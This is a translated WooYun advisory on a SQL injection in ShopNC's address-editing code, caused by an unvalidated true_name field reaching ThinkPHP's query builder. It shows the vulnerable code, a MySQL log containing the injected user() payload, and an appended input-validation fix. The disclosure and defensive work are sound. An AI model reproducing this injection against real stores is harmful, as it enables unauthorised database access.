Vulnerability summary

Defect ID: wooyun-2015-0143429

Title: ShopNC SQL injection vulnerability

Vendor: shopnc.net

Author: pang0lin

Submitted: 2015-10-10 13:40

Fix time: 2016-01-13 13:43

Published: 2016-01-13 13:43

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-10: details sent to the vendor, awaiting vendor handling
2015-10-15: vendor actively ignored the vulnerability; details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol)
2015-12-09: details opened to core white hats and domain experts
2015-12-19: details opened to regular white hats
2015-12-29: details opened to intern white hats
2016-01-13: details opened to the public

Brief description:

ShopNC injection vulnerability

Details:

This is less a fault of ShopNC than of the ThinkPHP framework; ShopNC simply has not kept up with the times and is unaware that the ThinkPHP framework now has many known problems.
1. First, locate the vulnerable code in shop/control/member_address.php:

if (chksubmit()){
    /**
     * Validate the form fields
     */
    $obj_validate = new Validate();
    $obj_validate->validateparam = array(
        array("input"=>$_POST["true_name"],"require"=>"true","message"=>$lang['member_address_receiver_null']),
        array("input"=>$_POST["area_id"],"require"=>"true","validator"=>"Number","message"=>$lang['member_address_wrong_area']),
        array("input"=>$_POST["city_id"],"require"=>"true","validator"=>"Number","message"=>$lang['member_address_wrong_area']),
        array("input"=>$_POST["area_info"],"require"=>"true","message"=>$lang['member_address_area_null']),
        array("input"=>$_POST["address"],"require"=>"true","message"=>$lang['member_address_address_null']),
        array("input"=>$_POST['tel_phone'].$_POST['mob_phone'],'require'=>'true','message'=>$lang['member_address_phone_and_mobile'])
    );
    $error = $obj_validate->validate();
    if ($error != ''){
        showValidateError($error);
    }
    $data = array();
    $data['member_id'] = $_SESSION['member_id'];
    $data['true_name'] = $_POST['true_name']; // copied as-is: only "require" was checked above
    $data['area_id'] = intval($_POST['area_id']);
    $data['city_id'] = intval($_POST['city_id']);
    $data['area_info'] = $_POST['area_info'];
    $data['address'] = $_POST['address'];
    $data['tel_phone'] = $_POST['tel_phone'];
    $data['mob_phone'] = $_POST['mob_phone'];
    $data['is_default'] = $_POST['is_default'] ? 1 : 0;
    if ($_POST['is_default']) {
        $address_class->editAddress(array('is_default'=>0),array('member_id'=>$_SESSION['member_id'],'is_default'=>1)); // traced below
    }

    if (intval($_POST['id']) > 0){
        $rs = $address_class->editAddress($data, array('address_id' => $_POST['id']));
        if (!$rs){
            showDialog($lang['member_address_modify_fail'],'','error');
        }
    }


2. Follow the editAddress() function:

public function editAddress($update, $condition){
    // passes the caller's arrays straight to ThinkPHP's query builder
    return $this->where($condition)->update($update);
}


3. This function calls ThinkPHP's where() and update() directly to build and execute the query, and among the values passed in, $_POST['true_name'] is only checked for presence; its content is never validated as a string. A defect in ThinkPHP itself can therefore be used to construct a payload.
First, add a shipping address.

(screenshot: 4.png)

Then capture the request with Burp and change the true_name field as shown in the test code.

(screenshot: 3.png)

Then view the shipping addresses again.

(screenshot: 2.png)

4. Now look at the MySQL log file:

150925 10:36:39	  232 Connect	root@localhost on 33hao
232 Query SET CHARACTER_SET_CLIENT = utf8,
CHARACTER_SET_CONNECTION = utf8,
CHARACTER_SET_DATABASE = utf8,
CHARACTER_SET_RESULTS = utf8,
CHARACTER_SET_SERVER = utf8,
COLLATION_CONNECTION = utf8_general_ci,
COLLATION_DATABASE = utf8_general_ci,
COLLATION_SERVER = utf8_general_ci,
sql_mode=''
232 Query SELECT * FROM `33hao`.`33hao_member` WHERE ( member_id = '1' ) LIMIT 1
232 Query SELECT COUNT(*) AS nc_count FROM `33hao`.`33hao_address` WHERE ( member_id = '1' ) LIMIT 1
232 Query INSERT INTO `33hao`.`33hao_address` (member_id,true_name,area_id,city_id,area_info,address,tel_phone,mob_phone,is_default) VALUES ('1',1,1,1,1,user(),1,1,1) -- a,'38','36','北京 北京市 西城区','awddsad','13800000000','13800000000','0')


Proof of vulnerability:

(screenshot: 2.png)

Fix:

Filter user input.

Copyright: please credit pang0lin@WooYun when reposting.
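What "filter" has to mean here follows from the code in step 1 and the log in step 4: the handler copies $_POST['true_name'] and the other text fields into $data without any type or content check, and the log shows that value reaching the INSERT unquoted. The hardened replacement below is an added example, not ShopNC's or ThinkPHP's code; the function names (requireString, optionalPhone, requirePositiveInt, buildAddressData) and the length limits are assumptions. It enforces the invariant that only typed scalars reach the ORM: every text field must be a plain string (arrays and missing keys are refused), ids must be digit-only, phone numbers must match a narrow pattern, and the two sample requests at the end are constructed to show the accept and reject paths.

```php
<?php
// Added example (not ShopNC's own code): hardened replacement for the
// "$data[...] = $_POST[...]" assignments in shop/control/member_address.php.
// The original Validate() pass only checks "require", so whatever shape the
// field arrives in is handed to where()->update(). Here each field is turned
// into a typed scalar or the request is rejected.

final class InvalidAddressInput extends InvalidArgumentException {}

/** Return $post[$key] only if it is a non-empty plain string within $maxLen characters. */
function requireString(array $post, string $key, int $maxLen): string
{
    if (!array_key_exists($key, $post) || !is_string($post[$key])) {
        // Arrays, objects and missing keys are all refused outright.
        throw new InvalidAddressInput("$key must be a string");
    }
    $value = trim($post[$key]);
    if ($value === '' || mb_strlen($value, 'UTF-8') > $maxLen) {
        throw new InvalidAddressInput("$key is empty or too long");
    }
    return $value;
}

/** Optional phone field: empty string allowed, otherwise digits, '+' and '-' only. */
function optionalPhone(array $post, string $key): string
{
    if (!isset($post[$key]) || $post[$key] === '') {
        return '';
    }
    if (!is_string($post[$key]) || !preg_match('/^\+?[0-9\-]{3,20}$/', $post[$key])) {
        throw new InvalidAddressInput("$key is not a valid phone number");
    }
    return $post[$key];
}

/** Positive integer id as a digit string; intval() alone would silently map junk to 0. */
function requirePositiveInt(array $post, string $key): int
{
    if (!isset($post[$key]) || !is_string($post[$key]) || !ctype_digit($post[$key])) {
        throw new InvalidAddressInput("$key must be a positive integer");
    }
    return (int) $post[$key];
}

/**
 * Build the $data array for editAddress() from raw POST input.
 * Every value is a typed scalar, so the query builder never receives
 * a non-string where a string column value was expected.
 */
function buildAddressData(array $post, int $memberId): array
{
    $data = [
        'member_id'  => $memberId,
        'true_name'  => requireString($post, 'true_name', 50),
        'area_id'    => requirePositiveInt($post, 'area_id'),
        'city_id'    => requirePositiveInt($post, 'city_id'),
        'area_info'  => requireString($post, 'area_info', 255),
        'address'    => requireString($post, 'address', 255),
        'tel_phone'  => optionalPhone($post, 'tel_phone'),
        'mob_phone'  => optionalPhone($post, 'mob_phone'),
        'is_default' => !empty($post['is_default']) ? 1 : 0,
    ];
    // Mirrors the original rule that at least one phone number is required.
    if ($data['tel_phone'] === '' && $data['mob_phone'] === '') {
        throw new InvalidAddressInput('tel_phone or mob_phone is required');
    }
    return $data;
}

// Constructed sample requests: a well-formed one, and one whose true_name
// is not a string (the original code would copy it into $data unchanged).
$good = ['true_name' => 'Zhang San', 'area_id' => '38', 'city_id' => '36',
         'area_info' => '北京 北京市 西城区', 'address' => 'Some street 1',
         'tel_phone' => '', 'mob_phone' => '13800000000', 'is_default' => '0'];
$bad  = $good;
$bad['true_name'] = ['not', 'a', 'string'];

echo buildAddressData($good, 1)['true_name'], "\n";
try {
    buildAddressData($bad, 1);
} catch (InvalidAddressInput $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The exception should be turned into the same showValidateError() path the handler already uses, so a rejected request never reaches editAddress(). The same checks apply to the add-address branch and to the 'address_id' => $_POST['id'] condition, which should likewise be passed through requirePositiveInt() rather than used raw.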


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2016-01-13 13:43

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet